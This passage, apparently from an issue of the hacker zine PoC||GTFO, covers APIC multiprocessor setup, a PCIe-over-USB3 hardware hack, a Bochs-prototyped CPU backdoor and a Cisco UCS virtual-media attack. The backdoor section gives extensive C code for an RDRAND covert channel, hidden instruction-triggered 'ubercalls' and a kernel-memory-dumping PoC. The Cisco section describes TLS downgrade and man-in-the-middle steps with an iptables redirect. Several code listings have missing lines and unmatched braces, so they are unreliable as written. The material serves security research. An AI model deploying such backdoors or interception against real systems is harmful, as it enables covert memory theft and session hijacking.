       ; Bit 5 specifies if the output is high or not.
22     and al, 0 x20
       jz .delay
   ; Send the Startup IPI.
26 ; Vector XX specifies the page,
   ;     giving trampoline address 0x000XX000.
28 ; In our case, 0x07000.
   ; 110b -> SIPI.
30 mov dword [local_apic + icr_low], 7|(110 b<<8)|(1<<14)|(11b<<18)

In the trampoline, we initialize the AP with a stack, and switch to protected mode. In our revised proof-of-concept, we’ve disabled paging due to space constraints, but no special logic is required to handle that case either.

The MPS/ACPI Tables

Broadcasting INIT IPIs to all CPUs except the current one is not recommended; the BIOS may have disabled specific faulty processors, which would also receive the IPI. Instead, the BIOS provides a list of all local APICs with their local APIC ID. The MultiProcessor Specification (MPS) tables, or the Multiple APIC Description Table (MADT) sub-table in the ACPI tables.10 IPIs with the destination mode set as physical and the destination field set with the specific LAPIC ID of the target processor can be used to initialize all processors one by one.


Each local APIC unit also has a specific timer, for per-CPU time keeping. However, the local APIC timer operates on the CPU’s frequency, as opposed to the PIT which uses a fixed frequency. We first calibrate the local APIC timer, and then configure it to periodically generate an interrupt every 10 ms.

   ; Though alarmingly versatile, LAPIC eerily echoes nice
 2 ; sentiments of lots of effort for little gain.
   ; Set the divide configuration register as divide by 1.
 4 mov dword [local_apic + timer_divide_config], 1011b
   mov dword [local_apic + lvt_timer], 63
 6 mov dword [local_apic + initial_count_timer], -1

 8 ; Start the PIT channel 2 timer.
   in al, 0x61
10 and al, 0xFE
   out 0x61, al
12 or al, 1
   out 0x61, al
16     in al, 0x61
       ; Bit 5 specifies if the output is high or not.
18     and al, 0x20
       jz .delay
   mov eax, [local_apic + current_count_timer]
22 not eax
   mov [initial_count], eax
   mov dword [local_apic + timer_divide_config], 1011b
26 ; (1 << 17) specifies periodic.
   mov dword [local_apic + lvt_timer], 63 | (1 << 17)
28 mov eax, [initial_count]
   mov dword [local_apic + initial_count_timer], eax


As opposed to the PIC, the peripheral to I/O APIC routing is not fixed. The MPS and ACPI tables specify this routing. Covering the parsing of this routing is beyond the scope of this article.


Dining Philosophers

The philosophers have taught us that if you have a bite in front of you, synchronize the picking up your forks and eat the bite. If you’ve got 512 bytes, eat all the damned 512 bytes.

The PoC has each CPU as a philosopher stuffing itself on its 512 bytes. On acquiring the forks, the CPU executes the magic Bochs breakpoint instruction, ‘xchg bx, bx’ at 0x7D50. On losing the fork, it executes ‘xchg bx, bx’ at 0x7D39.

Till Next Time

The article got us through initializing our dining philosophers and making them eat. In future issues, we will look at other aspects of the x86 architecture, including, but not limited to Non-Uniform Memory Access (NUMA) systems.

Till next time,

1 hlt:
3     jmp hlt

5:7 A Breakout Board for Mini-PCIe; or, My Intel Galileo has less RAM than its Video Card!

by Joe FitzPatrick

Dear Acolytes of Electricity, let us spend a moment remembering the daily struggles from a time before enlightenment. For let us not forget that there was a time that even the most modest system upgrade required a screwdriver. And let us recall the dark moments when we were alone with DIP switches, not knowing what to set or where to seek divine guidance.

Alas, device enumeration has come and we are saved. An I for an O is not longer the rule of the land, but devices now merely ask and they shall receive. The bounty of interrupts and fruitfulness of MMIO are gifts granted upon enumeration, a baptism into a new order of hardware that Just Works.

Beware, friends. There are those who would have us believe that life is not easy. For we may still find need to open cases with screwdrivers, align cards in slots, and insert cables with retention clips. But this is merely a ruse! Deep down inside, it is new and enlightened, but still lives and acts as it has since the unenlightened times. Verily I tell you: there is a better way. Let us liberate this hardware!

PCIe is as easy as USB

USB is great. We can plug stuff in, and it just works. If we need more ports, we can use a hub. Down below there’s differential signaling. There’s automatic speed negotiation. At the higher layers there are standardized structures that report all the INs and OUTs of the device. And these help software know exactly which drivers to load when the device is attached and identified.


Figure 5.2: PCIe over USB 3.0

PCIe is more similar than you might imagine. You plug stuff in and it just works, though it sometimes requires a shutdown. If you need more slots, you can use a switch. There’s differential signaling automatic detection, and automatic speed and width negotiation. Standardized structures report the details of the device, and allow software to know exactly which drivers to load.

The PCI SIG actually did a pretty darn good job with PCIe. They made it so that even if you screw everything up with your hardware design, it’ll still probably work. Which also means we can screw around with it, hack things together and it’ll still probably work too.

I have a divine vision I would like to share. I believe with all of my soul that, as long as we can get a couple wires hooked up properly, we can bring any PCIe host and PCIe device together.

Before you all tell me to GTFO, I’ll get on with the PoC. Galileo is a board with a 400 MHz Pentium-class processor that has been kluged into an Arduino form factor. It has a Mini-PCIe slot on the bottom which is supposed to only be used for Wifi adapters. But if I just stuck to what I was supposed to do I’d still be flashing LEDs and saving my graphics cards for real computers.

An Incongruous Fornication of Hardware

So, the PoC is to get this Arduino working with a Geforce GTX 650 Ti Boost. Because a 1.1 GHz, 768-core gpu with 2 GB of memory is a good mate to a 400 MHz single core CPU. First we’ll talk hardware, then we’ll gloss over the software.

We’ve got a PCIe 3.0 x16 device—sixteen TX pairs and sixteen RX pairs that run up to 8 GHz on a 164 pin connector. When the device first connects, the physical layer figures out how wide the link is and scales it down as necessary. In addition, the link starts at PCIe 1.0 speeds of 2.5 GHz and only “retrains” to a higher speed if both ends support and the error rate stays low. Even at 2.5 GHz, we can do a crappy job wiring it and our data rate might suck—but thanks to fancy protocols and error detection it will probably still work.

So really, we only need four wires—two for TX and two for RX. Many devices work fine without a reference clock, but we’ll throw in those extra two pins for good measure. The Galileo board has a MiniPCIe slot, and we’ve got a full size PCIe card that’s five times the size of and twenty times the weight of the Galileo itself. We need some way of cabling them together.

The PCI SIG actually defines external cables for PCIe, but they’re really expensive. Let’s brainstorm. We need a cheap cable that can carry two 2.5 GHz pairs and one 100 MHz clock pair. That sounds suspiciously like, hmm, a USB 3 cable! So, I threw together a couple boards—one to plug in the MiniPCIe slot, the other to plug the graphics card into, and USB 3 sockets to connect them. The slot-end board also has a 12 V/5 V power header and voltage regulator—MiniPCIe only supplies a little juice at 3.3 V while PCIe requires 12 V and 3.3 V. Pirate the board files by unzipping pocorgtfo05.pdf.11 You can get premade PCIe extenders/adapters like these on eBay or elsewhere, but what’s the fun in that?

So, plug everything in, attach an external power supply to the graphics card, power it up, and. . . nothing. Or so it would seem. But, we’ve got a serial console on the Galileo, so we can check it out by running lspci.

And there we have it! An Nvidia 0x10de standing out in a sea of Intel 0x8086. Our graphics card is connected, enumerated, and waiting for drivers.


Figure 5.3: PCIe Adapters


Figure 5.4: lspci -k

Solemnization through Software

On a normal desktop, the BIOS starts up, runs the video BIOS that initializes the display, and gets on with things. But this is supposed to be a tiny embedded system. While it does boot via EFI, it doesn’t run video BIOS or any option ROMs. We’ll have to do that by hand.

There’s already great instructions by Sergey Kiselev on how to build your own Linux for Galileo available.12 I mostly followed those to get a standard install working, but I had to make two changes between steps 7 and 8 of Kiselev’s tutorial. We need to add all the X11 related packages, and we need to enable nouveau, the open-source Nvidia drivers, in our kernel configuration.

  7.1. Add ''x11'' to the DISTRO\_FEATURES line in
2 meta-clanton_vxxxx/meta-clanton-distro/conf/distro/clanton-
  7.2. Configure the kernel by running
4 ''bitbake linux-yocto-clanton -c menuconfig'' and
  enabling nouveau under drivers->graphics->nouveau

Copy the resulting files to a MicroSD card, pop it in your Galileo, and you are a modprobe nouveau && startx away from what might be the most inefficient way to drive a display ever devised. Of course, there’s no window manager or input devices yet configured, so you can’t do much, but that’s just a software problem, right?


Figure 5.5: PCIe Adapters

5:8 Prototyping a generic x86 backdoor in Bochs; or, I’ll see your RDRAND backdoor and raise you a covert channel!


by Matilda

Inspired by Taylor Hornby’s article in PoCGTFO 3:6 about a way to backdoor RDRAND, I designed and prototyped a general backdoor for an x86 CPU that, without knowing a 128 bit AES key, can only be proven to exist by reverse-engineering the die of the CPU.

In order to have a functioning backdoor we need several things. We need a context in which to execute backdoor code and ways to communicate with the backdoor code. The first one is easy to solve. If we are able to create new hardware on the CPU die, we can add an additional processor on it with a bit of memory and have it be totally independent from any of the code that the x86 CPU executes. Let’s call this or its Bochs emulation an Ubervisor.

We store the state for the ubervisor in an appropriately-named structure.

 1 struct {
     /* data to be encrypted */
 3   uint8_t evilbyte=0xff;
     uint8_t evilstatus=0xff ;
 5   /* counter for output covert channel */
     uint64_t counter = 0;  /* incremented by 1 each time
 7                             RDRAND is called */
     uint64_t i_counter = 0;
 9           /* entering ADD_GqEqR we evaluate
                ((RAX << 64) | RBX) ^ AES_k(i_counter)
11              and if it gives us the magic number we end
                up incrementing i_counter twice (to generate
13              256 bits of keystream, as we read four 64-bit
                regs). If we do not get the magic number,
15              we *do not* increment i_counter. this allows
                us to remain in synchronization */
17   /* key */
     uint8_t aes_key [17] = "YELLOW SUBMARINE";
     /* output status is 0 if we need to output the high half of
21      the block, or 1 if we need to output the low half (and
        then increment the counter afterwards, of course) */
23   uint8_t out_stat = 0;
   } evil;

Communicating with the backdoor is harder. We need to find out how to pass data from user mode x86 code to the ubervisor. No code running on the CPU—whether in user mode, kernel mode, or even SMM mode—should be able to determine if the CPU is backdoored.

Data exfiltration using RDRAND as a covert channel.

Let’s first focus on communication from the ubervisor to user mode x86 code.

An obvious choice to sneak data from the ubervisor to user mode x86 code is using RDRAND. There is no way, besides reverse engineering the circuits implementing RDRAND, to tell whether the output of RDRAND is acting as a covert channel.

All other instructions may be comparable to legitimate known-good reference CPU values against a possibly-backdoored CPU, where all registers and memory are checked after each instruction. RDRAND being non-deterministic by nature, it is not possible to perform the same differential analysis to detect backdoors without reverting to more costly techniques, such as timing analysis.

Our implementation of an RDRAND covert channel goes in the Bochs function BX_CPU_C::RDRAND_Eq(bxInstruction_c *i).

   Bit64u val_64 = 0;
 2 uint8_t ibuf [16];
   /* input buffer is organized like this :
 4    8 bytes -- counter
      6 bytes of padding
 6    1 byte -- evilstatus
      1 byte -- evilbyte */
 8 uint8_t obuf [16];
   AES_KEY keyctx ;
   AES_set_encrypt_key (BX_CPU_THIS_PTR evil.aes_key, 128,
12                      & keyctx );

14 memcpy (ibuf,       &(BX_CPU_THIS_PTR evil.counter), 8) ;
   memset (ibuf+8,     0xfe, 6) ;
16 memcpy (ibuf+8+6,   &(BX_CPU_THIS_PTR evil.evilstatus), 1) ;
   memcpy (ibuf+8+6+1, &(BX_CPU_THIS_PTR evil.evilbyte), 1) ;
   AES_encrypt (ibuf, obuf, & keyctx );
   if (BX_CPU_THIS_PTR evil.out_stat == 0) { // output high half
22    memcpy (& val_64, obuf, 8) ;
      BX_CPU_THIS_PTR evil. out_stat = 1;
24 } else {                                  // output low half
      memcpy (& val_64 , obuf + 8, 8) ;
26    BX_CPU_THIS_PTR evil . out_stat = 0;
      BX_CPU_THIS_PTR evil . counter ++;
28 }

30 BX_WRITE_64BIT_REG (i -> dst (), val_64 );

Note that the output of RDRAND here is AESk(noncecounter), where we encode the data we wish to exfiltrate in the nonce. The 64-bit counter is there just to make the output look random to anyone who does not know the key. Unlike the standard uses of the counter mode, there is no xor-with-keystream involved in our exfiltration at all; what we do is equivalent to using the CTR mode for encrypting a plaintext of all zeros while transmitting actual data through the nonces.

The reason for this tweak is synchronization. Legitimate code may call RDRAND any number of times between our own invocations. If we used the CTR mode to generate a keystream to XOR with the data we exfiltrated, we would not be able to deduce the offset within the keystream given RDRAND values from two sequential calls. With our nonce-based method, we suffer from no synchronization issues and retain all security properties of the CTR mode.

Unless the counter overflows, the output of this version of RDRAND cannot be distinguished from random data unless you know the AES key. Overflows can be avoided by incrementing the key just before the counter overflows.

All we need now is to receive data from this covert channel as the output of two consecutive RDRAND executions. In the rare case that the OS preempts us between the two RDRAND instructions to run RDRAND for itself or another process, we need to try executing the two RDRANDs again. In practice, this form of interruption has not been observed.

Data Infiltration to the Ubervisor

We now need to find a way for user mode x86 code to communicate data to the ubervisor while keeping it impossible to detect it is doing so. First, we need to encrypt all the data we send to the ubervisor. Second, we need a way to signal to the ubervisor that we would like to send it data.

I decided to hook the ADD_EqGqM function, which is called when an ADD operation on two 64-bit general registers is decoded. In order to signal to the ubervisor that there is valid encrypted data in the registers, we put an encrypted magic cookie in RAX and RBX and test for it each time the hooked instruction is decoded. If the magic cookie is found in RAX/RBX, we extract the encrypted data from RCX/RDX.

We encrypt the data with AES in counter mode, using a different counter than is used for the RDRAND exfiltration. Again, we have a synchronization issue: how can we make sure we always know where the ubervisor’s counter is? We resolve this by having the counter increment only when we see a valid magic cookie and, of course, for each 128-bit chunk of keystream we generate afterwards (used to decrypt the data we are sending to the ubervisor). That way, the ubervisor’s counter is always known to us, regardless of how many times the hooked instruction is executed.

Note that CTR mode is malleable. If this were a production system, I would include a MAC and store the MAC result in an additional register pair.

Here is the backdoored ADD_GqEqR function:

   BX_INSF_TYPE BX_CPP_AttrRegparmN(1)
 2  BX_CPU_C::ADD_GqEqR(bxInstruction_c *i) {
      Bit64u op1_64, op2_64, sum_64;
 4    uint8_t error = 1;
      uint8_t data = 0xcc;
 6    uint8_t keystream [16];
 8    op1_64 = BX_READ_64BIT_REG(i->dst());
      op2_64 = BX_READ_64BIT_REG(i->src());
10    sum_64 = op1_64 + op2_64;
12    /* Ubercall calling convention:
14    RAX = 0x99a0086fba28dfd1
      RBX = 0xe2dd84b5c9688a03
18     RCX = ubercall number
      RDX = argument 1 (usually an address)
20    RSI = argument 2 (usually a value)
22    testing only:
      RDI = return value
24    RBP = error indicator (1 iff an error occurred)
      ^^^^^ testing only ^^^^^
      ubercall numbers:
28    RCX = 0xabadbabe00000001 is PEEK to a virtual address
      return *(uint8_t *) RDX
30    RCX = 0xabadbabe00000002 is POKE to a virtual address
       *(uint8_t *) RDX = RSI
32     if the page table walk fails, we don't generate any
       kind of fault or exception, we just write 1 to the
34     error indicator field.
36     the page table that is used is the one that is used when
       the current process accesses memory
       RCX = 0xabadbabe00000003 is PEEK to a physical address
40     return *(uint8_t *) RDX
       RCX = 0xabadbabe00000004 is POKE to a physical address
42     *(uint8_t *) RDX = RSI
44     (we only read/write 1 byte at a time because anything
       else could involve alignment issues and/or access that
46     cross page boundaries)
50    if (    ((RAX ^ *((uint64_t *) keystream))
               == 0x99a0086fba28dfd1)
52         && ((RBX ^ *((uint64_t *) keystream + 1))
               == 0xe2dd84b5c9688a03))
54    {
           // we have a valid ubercall, let's do this texas-style
56         printf("COUNTER = %016lX ",
                  BX_CPU_THIS_PTR evil.i_counter);
58         printf("entered ubercall! RAX = %016lX RBX = %016lX"
                  "RCX = %016lX RDX = %016lX ",
60                RAX, RBX, RCX, RDX);
           BX_CPU_THIS_PTR evil.i_counter++;
62         ctr_output(keystream);
           BX_CPU_THIS_PTR evil.i_counter++;
           switch (RCX ^ *((uint64_t *) keystream)) {
66              case 0xabadbabe00000001: // peek, virtual
68                     RDX ^ *((uint64_t *) keystream + 1),
                       1, 0, BX_READ, (void *) &data, &error);
70                 BX_CPU_THIS_PTR evil.evilbyte = data;
                   BX_CPU_THIS_PTR evil.evilstatus = error;
72                 break;
74         // We start at the hi half of the output block now.
           BX_CPU_THIS_PTRevil.out_stat = 0;
76     }
78     BX_WRITE_64BIT_REG(i->dst(), sum_64);
80     SET_FLAGS_OSZAPC_ADD_64(op1_64, op2_64, sum_64);
82     BX_NEXT_INSTR(i);
   void BX_CPU_C :: ctr_output (uint8_t *out) {
86      uint8_t ibuf [16];

88      AES_KEY keyctx;
        AES_set_encrypt_key(BX_CPU_THIS_PTR evil.aes_key,
90                          128, &keyctx);

92      memset(ibuf, 0xef, 16);
        memcpy(ibuf, &(BX_CPU_THIS_PTR evil.i_counter), 8);
94      AES_encrypt(ibuf, out, &keyctx);

Fun things to do in Ring -4

Now that we have ways to get data in and out of the ubervisor, we need to consider what exactly can be done within the ubervisor. In the general case, we create a bit of memory space and register space for our ubervisor and have ubercalls that allow reading and writing from the ubervisor’s memory space as well as starting and stopping the ubervisor execution to load and execute arbitrary code isolated from the x86 core.

For sake of simplicity, I just implemented one ubercall which reads a byte from the specified virtual address and returns it via the RDRAND covert channel. This is done by ignoring all memory protection mechanisms. I needed to make copies of all the functions involved in converting a long mode virtual address into a physical address and strip out any code that changes the state of the CPU, including anything which adds entries to the TLB or causes exceptions or faults.

This is what the function called access_read_linear_nofail does.

  1 /* implementation of byte-at-a-time virtual read/writes for
       long mode that never cause faults/exceptions and maybe do
  3    not affect TLB content */

    #include "bochs.h"
  7 #include "cpu.h"
  9 #define BX_CR3_PAGING_MASK    (BX_CONST64(0x000ffffffffff000))
    #define PAGE_DIRECTORY_NX_BIT (BX_CONST64(0x8000000000000000))
      (BX_PHY_ADDRESS_RESERVED_BITS & BX_CONST64(0xfffffffffffff))
 15 #define BX_LEVEL_PML4  3
    #define BX_LEVEL_PDPTE 2
 17 #define BX_LEVEL_PDE   1
    #define BX_LEVEL_PTE   0
    // keep it 4 letters
 21 static const char * bx_paging_level[4] = { "PTE",  "PDE",
                                               "PDPE", "PML4" };
    Bit8u BX_CPP_AttrRegparmN(2)
 25 BX_CPU_C::read_virtual_byte_64_nofail(
                    unsigned s, Bit64u offset, uint8_t *error)
 27 {
        Bit8u data;
 29     Bit64u laddr = get_laddr64(s, offset); // this is safe

 31     if (! IsCanonical(laddr)) {
            *error = 1;
 33         return 0;
        access_read_linear_nofail(laddr, 1, 0, BX_READ,
 37                               (void *) &data, error);
        return data;
 39 }

 41 int BX_CPU_C::access_read_linear_nofail(
                      bx_address laddr, unsigned len,
 43                   unsigned curr_pl, unsigned xlate_rw,
                      void *data, uint8_t *error)
 45 {
       Bit32u combined_access = 0x06;
 47    Bit32u lpf_mask = 0xfff; // 4K pages
       bx_phy_address paddress, ppf, poffset=PAGE_OFFSET(laddr);
       paddress=translate_linear_long_mode_nofail(laddr, error);
 51    paddress=A20ADDR(paddress);
       if (*error == 1) {
 53        return 0;
 55    access_read_physical(paddress, len, data);

 57    return 0;
    bx_phy_address BX_CPU_C::translate_linear_long_mode_nofail(
 61                          bx_address laddr, uint8_t *error)
 63    bx_phy_address entry_addr[4];
       bx_phy_address ppf =
 65                BX_CPU_THIS_PTR cr3 & BX_CR3_PAGING_MASK;
       Bit64u entry[4];
 67    bx_bool nx_fault = 0;
       int leaf;
       Bit64u offset_mask = BX_CONST64(0x0000ffffffffffff);
       Bit64u reserved = PAGING_PAE_RESERVED_BITS;
 73    if (! BX_CPU_THIS_PTR efer.get_NXE())
           reserved |= PAGE_DIRECTORY_NX_BIT;
       for (leaf = BX_LEVEL_PML4;; --leaf) {
 77        entry_addr[leaf] =
                  ppf + ((laddr >> (9 + 9*leaf)) & 0xff8);
           access_read_physical(entry_addr[leaf], 8,
 81                             &entry[leaf]);
           BX_NOTIFY_PHY_MEMORY_ACCESS(entry_addr[leaf], 8,
 83                                    BX_READ, (BX_PTE_ACCESS + leaf),
                                       (Bit8u *)(&entry[leaf]));
 85        offset_mask >>= 9;

 87        Bit64u curr_entry = entry[leaf];
           int fault = check_entry_PAE(
 89                        bx_paging_level[leaf], curr_entry,
                           reserved, 0, &nx_fault);
 91        if (fault >= 0) {
               *error = 1;
 93            return 0;
           ppf = curr_entry & BX_CONST64(0x000ffffffffff000);
           if (leaf == BX_LEVEL_PTE) break;
           if (curr_entry & 0x80) {
101            if (leaf > (BX_LEVEL_PDE +
                           !!bx_cpuid_support_1g_paging())) {
103                BX_DEBUG(("PAE %s: PS bit set !",
105                *error = 1;
                   return 0;
107            }

109            ppf &= BX_CONST64(0x000fffffffffe000);
               if (ppf & offset_mask) {
111                BX_DEBUG(("PAE %s: reserved bit is set: 0x"
113                          bx_paging_level[leaf], curr_entry));
                   *error = 1;
115                return 0;
119        }
       } /* for (leaf = BX_LEVEL_PML4;; --leaf) */

123    *error = 0;
       return ppf | (laddr & offset_mask);
125 }

Please note that the above code chokes if reading more than one byte, because for simplicity, I have removed all code that deals with alignment issues and reads that span multiple pages.

If we were making an actual CPU with this backdoor mechanism, we would be more devious: instead of commanding a read when we make the ubercall, we would wait until the requested memory address is read by a legitimate process. This is so that the operation is not observable by looking at the activity on the wiring between the CPU and memory. That way, neither software nor hardware observation can reveal the presence of this type of backdoor besides analyzing the CPU die itself.

Note that anything that the CPU can access has to be accessible by this type of backdoor. There is no way to hide your information from this backdoor and still be able to process it with your CPU.

A PoC to dump kernel memory.

Once we have patched Bochs, we can start up Linux and run the following code to dump an arbitrary range of virtual memory:

 1 #include <openssl/aes.h>
   #include <stdlib.h>
 3 #include <string.h>
   #include <stdint.h>
 5 #include <stdio.h>

 7 struct ctrctx {
       uint64_t counter;
 9     uint8_t aeskey [16];
   void poke() {
13     volatile uint64_t c,d;
       c = 0xaaabadbadbadbeef;
15     d = 0xbeefbeefbeefbeef;
       asm volatile("rdrand  %0 "
17                  "rdrand  %1": "=r"(c), "=r"(d));
       printf("%016lX", c);
19     printf("%016lX ", d);
   int main() {
23     volatile uint64_t rax;
       volatile uint64_t rbx;
25     volatile uint64_t rcx;
       volatile uint64_t rdx;
27     uint64_t base, len, i;

29     struct ctrctx ctx;
       uint8_t buf [16];
       base = 0xffffffff8105c7e0;
33     len = 1024;
       ctx.counter = 0;
35     memcpy(ctx.aeskey, "YELLOW SUBMARINE", 16);

37     for (i = base; i < base + len; i++) {
           ctr_output(buf, &ctx);
           rax = 0x99a0086fba28dfd1;
41         rbx = 0xe2dd84b5c9688a03;
           rcx = 0xabadbabe00000001;
43         rdx = i;
45         rax ^= *((uint64_t *) buf);
           rbx ^= *((uint64_t *) buf + 1);
47         ctx.counter++;
           ctr_output(buf, &ctx);
49         rcx ^= *((uint64_t *) buf);
           rdx ^= *((uint64_t *) buf + 1);
51         ctx.counter++;

53         asm volatile(
             "add %0, %1" : "=a" (rax) : "a" (rax), "b" (rbx),
55                                       "c" (rcx), "d" (rdx):);
57     }
   void ctr_output(uint8_t *output, struct ctrctx *ctx) {
61     uint8_t ibuf [16];
       AES_KEY keyctx;
63     AES_set_encrypt_key(ctx->aeskey, 128, &keyctx);

65     memset(ibuf, 0xef, 16);
       memcpy(ibuf, &(ctx->counter), 8);
67     AES_encrypt(ibuf, output, &keyctx);

In the above code, an output in peek_output will generate a memory dump. Look at the last byte in each 16 byte block for the bytes of data.13

  for foo in 'cat peek_output';
2     do echo -n $foo |xxd -r -p | ./qw |
      openssl enc -d -aes-128-ecb -nopad
4         -K 59454c4c4f57205355424d4152494e45 |
          xxd >> dump;
6     done

Here are the first few lines of a dump, beginning at 0xffffffff8105c7e0.

   0000000:  db10 0000 0000 0000 fefe fefe fefe 00c0
 2 0000000:  dc10 0000 0000 0000 fefe fefe fefe 00be
   0000000:  dd10 0000 0000 0000 fefe fefe fefe 009f
 4 0000000:  de10 0000 0000 0000 fefe fefe fefe 0000
   0000000:  df10 0000 0000 0000 fefe fefe fefe 0000
 6 0000000:  e010 0000 0000 0000 fefe fefe fefe 0000
   0000000:  e110 0000 0000 0000 fefe fefe fefe 0048
 8 0000000:  e210 0000 0000 0000 fefe fefe fefe 00c7
   0000000:  e310 0000 0000 0000 fefe fefe fefe 00c7
10 0000000:  e410 0000 0000 0000 fefe fefe fefe 00d8
   0000000:  e510 0000 0000 0000 fefe fefe fefe 002f
12 0000000:  e610 0000 0000 0000 fefe fefe fefe 006f
   0000000:  e710 0000 0000 0000 fefe fefe fefe 0081
14 0000000:  e810 0000 0000 0000 fefe fefe fefe 00e8
   0000000:  e910 0000 0000 0000 fefe fefe fefe 000e
16 0000000:  ea10 0000 0000 0000 fefe fefe fefe 00bd

Look at the first few bytes starting at 0xffffffff8105c7e0, which is in the text section of the kernel. Run ./extract-vmlinux on the vmlinuz file and objdump -d to extract the code.

If you compare the first few bytes of the dump above with the output of objdump, you will find a match!

  ffffffff8105c7df:        75 c0
2 ffffffff8105c7e1:        be 9f 00 00 00
  ffffffff8105c7e6:        48 c7 c7 d8 2f 6f 81
4 ffffffff8105c7ed:        e8 0e bd ff ff

Note that throughout the execution of this program, all the deterministic register/memory state is identical whether or not you run it on a CPU that has this backdoor. Full code is available by unzipping pocorgtfo05.pdf.14


5:9 From Protocol to PoC; or, Your Cisco blade is booting PoCGTFO.

by Mik

We often see products with network protocols intended to be opaque to us. We suspect that we can do interesting things with it, but where do we start?

This article will guide you from an opaque protocol used by Cisco UCS and some Dell servers for KVM and remote virtual media block device functionality, to a PoC that takes advantage of this protocol’s bolt-on security. This protocol has been the subject of Bug IDs CSCtr72949 and CSCtr72964, better known as CVE-2012-4114 and CVE-2012-4115. But then, who among you, when your son hungers for a PoC, would give him a CVE?15

So we will walk the road to PoC together, working up to a way to replace the CD/DVD that the administrator is exporting with a more fun virtual ISO image, then take the further step of redirecting the inserted USB key via a more open protocol.16

While data centers are near-optimal habitats for computers, spending long hours and late nights there can be quite uncomfortable for humans. To alleviate this problem, most server systems incorporate a BMC management console that provides remote keyboard, mouse, video and virtual media—generally emulating a USB keyboard, mouse, DVD-ROM and removable disk, while also intercepting video output.

My journey down this road started when a prompt from my Cisco blade popped up. It turned out that while keyboard and mouse sessions could do TLS, the video or virtual media interfaces could not. This told me not only that the most dangerous interface to my systems was insecure, but also the TLS support was bolted-on and thus it wasn’t hard to trick a user who didn’t read the prompt text carefully.


While much fun could be had intercepting the keyboard and video streams, the importance of securing block device access seemed to be overlooked by those filling in the CVSS score form, so I took it upon myself to prepare a demonstration.

In order to do this, we need to understand the protocol, so let us link arms and take a stroll down PoC lane.


Distinguishing the individual frames is an excellent starting point for unraveling an otherwise unknown protocol. Generally speaking, a protocol will send messages in one of the following formats:

Explicit length: Just put the message length at or near the start of the message. Sometimes it’s the payload length, other times it includes the length field itself.

Examples of this are the DIAMETER protocol, TLS, and indeed the APCP/AVMP protocols described here.

Defer to upper-layer: It is common for UDP protocols to simply let the upper layer to define the frame boundary. It would be foolhardy for a protocol designer to rely on frame boundaries with TCP. Often the sending side will send a complete frame in a segment, offering a vital hint to the reverse engineer.

Delimiter: Classic examples of this are line-oriented protocols such as POP3 and SMTP where the delimiter is CRLF. Other protocols, those originally designed to operate over bitstream transports, refer to their delimiter as “sync bits.” The general rule is that the message starts or stops at an easily recognized boundary, and also that they do their damndest to avoid placing the delimiter in the message itself.

Dual-Mode: Even seasoned vi users occasionally type code while in command mode or find a rogue ex command in a config file. The same can be said for network protocols. HTTP uses CRLF-CRLF as a delimiter to denote the end of the headers, then once the Content-Length header has been parsed the message body length is known. This state transition makes for some awful, buggy implementations, a situation that didn’t improve with Chunked encoding.

This is extremely lucky, as it seems the application developer accidentally wrote the packet header byte at a time, each having its own segment. This makes it easy to distinguish the header from the body.

As we can see, there’s a magic field “APCP”, then a big-endian number that happens to match the frame size including the header, then four bytes.

The catch is that there are actually three protocols running on this port: APCP, BEEF, and AVMP, and their respective framing is subtly different.

APCP functions as a control protocol, so we need to decode those frames, even though we’re not particularly interested in them.

BEEF is the protocol that the keyboard, video and mouse operate on. We switch to pass-through mode when we see a BEEF packet, or indeed anything we don’t recognize, in order to allow it to pass unhindered.

AVMP is the virtual media protocol, which only starts when you click on the virtual media tab. The term “virtual media” may be more familiar if you rephrased it as “remote DVD-ROM and removable disk.”

Message Types

Binary protocols like these generally require that the type of message be in the message header. This is analogous to the request line in HTTP, in that it allows the remote end to route the message to the correct processing routine.

Often enabling logging on the application will simply name the decoded message type for you.17 There’s no need to over-extend yourself decoding particular message types if they don’t seem relevant to your PoC, but you should at least note the name and function of messages if you can infer them.


In this case we are dealing with block devices. Block device protocols only have two methods of interest.

read(offset, length) -> data[length] | error
write(offset, data[length]) -> ack | error

Offset and length are either multiplied by the block size or aligned to the block size. Block devices don’t let you write half-blocks—when you write less than a full block to the middle of a file, your filesystem needs to read in the block and write back the modified version.

The read response and write request were easy to spot—simply transfer some data and you’ll see it in the frame. The server will send a maximum of sixteen blocks per read response, but will respond in full using multiple messages then send a “Status” message with a code of zero. Error messages are simply “Status” messages with a non-zero code.

Note that in the case of AVMP and NBD (and indeed modern SCSI and ATA protocols) requests are tagged. Each tag is an opaque value on the request, which must be returned with the response. This allows multiple messages to be in-flight at once, which greatly increases the throughput.

Read requests in AVMP also have a third argument, referred to as the Block Factor, which is the maximum number of blocks the application should send back in a single read response. I did not try sending more, mostly because I wished to avoid an unpleasant trip to the data center.

There were other AVMP requests that I had to find and decode. These were the ones that described the drive, and mapped and unmapped a drive. (Inserted or removed a disk.)


In this age of mistrust, customers are demanding encryption for all of their network protocols. TLS is the standard answer; while it isn’t much fun to circumvent TLS, it’s generally not much trouble.

If the program talks some cleartext protocol before sending a TLS ClientHello, chances are that it is negotiating whether or not to enable TLS over the network. This is, of course, ridiculous, but alas it’s a popular idiom for bolted-on cryptography.18

In these circumstances, the prudent thing to do would be to tell the client that the server doesn’t know what TLS is. My PoC does this with the --downgrade option.


The server often enforces that only TLS connections should be allowed, but since the client is rarely authenticated at the TLS layer, your exploit tool may simply establish a TLS connection to the server while maintaining a cleartext connection to the client.

The effects of connection downgrade are rather subtle. While the connection is now operating in malleable cleartext, the prompt dialog changes only slightly. (Figure 5.6.)


Figure 5.6: Downgrade Effects

It should be noted that the virtual media component on the Cisco blades actually sends the cleartext password in the background before you mindlessly click “Accept.”19

If the client seems to only wish to talk TLS, an alternative approach may be used. You simply start up a TLS server and accept the client connection. You may then establish a TLS client connection to the server, and forward the data between them. This is commonly called a Man-in-The-Middle attack, but in this modern age it’s generally machines rather than men or women who perform such work.

Astute readers will note that this will annoy the certificate validation routine in the client application. In reality, this is rarely the case.20 If such a validation routine even exists, it can be bypassed with an Accept/Reject dialog which displays some textual information that you can easily duplicate in your own self-signed certificate.

For a particularly ironic example of this, look at the code in the supplied PoC. The two useful options work together with some way of passing the IP traffic to the Machine-in-the-Middle, which runs the client.

  --servercert SERVERCERT
2     File containing the server certificate for MitM
  --serverkey SERVERKEY
4     File containing the server private key for MitM

Your friendly neighborhood iptables can take care of the redirection.

  iptables -A PREROUTING -d [target IP] -p tcp --dport 2068
2          -j REDIRECT --to-ports 2068

Clients and Servers

